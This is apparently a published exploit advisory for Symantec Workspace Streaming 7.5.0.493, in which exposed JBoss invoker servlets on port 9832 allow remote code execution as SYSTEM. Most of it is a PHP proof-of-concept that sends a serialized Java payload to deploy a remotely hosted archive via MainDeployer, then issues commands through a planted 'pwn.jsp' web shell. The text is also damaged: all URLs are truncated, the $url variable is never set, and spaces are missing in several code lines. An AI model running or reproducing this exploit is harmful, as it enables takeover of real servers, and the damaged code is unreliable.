| Symantec Workspace Streaming 7.5.0.493 SWS Streamlet Engine Invoker Servlets Remote Code Execution 
  
 tested against: Microsoft Windows Server 2008 R2 sp1 
 download url: http:
 file tested: Symantec_Workspace_Streaming_7.5.0.493.zip 
  
 vulnerability: 
 the "SWS Streamlet Engine"service (as_ste.exe) listening 
 on publicport 9832 (tcp/http) is vulnerable. 
 It exposes the following servlet  
 http:
 http:
 due to a bundled invoker.sar 
 The result is remote code execution with NT AUTHORITY\SYSTEM 
 privileges. 
  
 proof of concept url: 
 http:
  
 proof of concept: 
  
 <?php 
  
  
  
  
  
  
  
  
  
 $host=$argv[1]; 
 $cmd=$argv[2]; 
 $port=80; 
  
  
  
 $url_len=pack("n",strlen($url)); 
  
 functionhex_dump($data, $newline="\n") {  
 static$from= '';    
 static$to= '';     
 static$width= 16; static$pad= '.';   
  if($from==='')   {      
      for($i=0; $i<=0xFF; $i++)  {  
          $from.= chr($i);        
          $to.= ($i>= 0x20 && $i<= 0x7E) ? chr($i) : $pad;    
      }    
  }     
 $hex= str_split(bin2hex($data), $width*2);    
 $chars= str_split(strtr($data, $from, $to), $width);     
 $offset= 0;    
 foreach($hexas$i=> $line)   {      
     echosprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' ['. $chars[$i] . ']'. $newline;     
    $offset+= $width;    
   }  
 }  
  
 $frag_i= 
 "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73". 
 "\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72". 
 "\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f". 
 "\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77". 
 "\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76". 
 "\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2". 
 "\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75". 
 "\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e". 
 "\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00". 
 "\x78\x70\x26\x95\xbe\x0a\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62". 
 "\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d". 
 "\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc". 
 "\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x77"; 
  
 $frag_ii="\x00"; 
  
 $frag_iii= 
 "\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e".     
 "\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f". 
 "\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00". 
 "\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e". 
 "\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b". 
 "\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73". 
 "\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65". 
 "\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78\x74\x00". 
 "\x06\x64\x65\x70\x6c\x6f\x79\x75\x71\x00\x7e\x00\x00\x00\x00\x00". 
 "\x01\x74". 
 $url_len. 
 $url. 
 "\x75\x72\x00". 
 "\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61".                         
 "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d". 
 "\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61". 
 "\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67"; 
  
 $frag_iv= 
 "\x0d\xd3".  
 "\xbe\xc9\x78\x77\x04\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67". 
 "\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f". 
 "\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8". 
 "\xfb\x72\x84\xd7\x93\x85\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64". 
 "\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x05\x73\x71\x00\x7e\x00\x05". 
 "\x77\x0d\x00\x00\x00\x05\xac\xed\x00\x05\x70\xfb\x57\xa7\xaa\x78". 
 "\x77\x04\x00\x00\x00\x03\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x04". 
 "\x73\x72\x00\x23\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e". 
 "\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74". 
 "\x69\x6f\x6e\x54\x79\x70\x65\x59\xa7\x3a\x1c\xa5\x2b\x7c\xbf\x02". 
 "\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00". 
 "\x00\x01\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x0a\x70\x74\x00\x0f". 
 "\x4a\x4d\x58\x5f\x4f\x42\x4a\x45\x43\x54\x5f\x4e\x41\x4d\x45\x73". 
 "\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d". 
 "\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03". 
 "\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62". 
 "\x6f\x73\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69". 
 "\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78". 
 "\x78";                                                             
  
 $data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv; 
  
  
 $pk="POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n". 
     "ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n". 
     "Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n". 
     "User-Agent: Java/1.6.0_21\r\n". 
     "Host: ".$host.":".$port."\r\n". 
     "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n". 
     "Connection: keep-alive\r\n". 
     "Content-type: application/x-www-form-urlencoded\r\n". 
     "Content-Length: ".strlen($data)."\r\n\r\n". 
     $data; 
 echohex_dump($pk)."\n"; 
 $fp=fsockopen($host,$port,$e,$err,3); 
 fputs($fp,$pk); 
 $out=fread($fp,8192); 
 fclose($fp); 
 echohex_dump($out)."\n"; 
  
 sleep(5); 
  
 $pk="GET /a/pwn.jsp?cmd=".urlencode($cmd)." HTTP/1.0\r\n". 
     "Host: ".$host.":".$port."\r\n". 
     "Connection: Close\r\n\r\n"; 
  
 echohex_dump($pk)."\n"; 
 $fp=fsockopen($host,$port,$e,$err,3); 
 fputs($fp,$pk); 
 $out=""; 
 while(!feof($fp)) { 
 $out.=fread($fp,8192); 
 } 
 fclose($fp); 
 echo$out; 
 ?> 
 
 |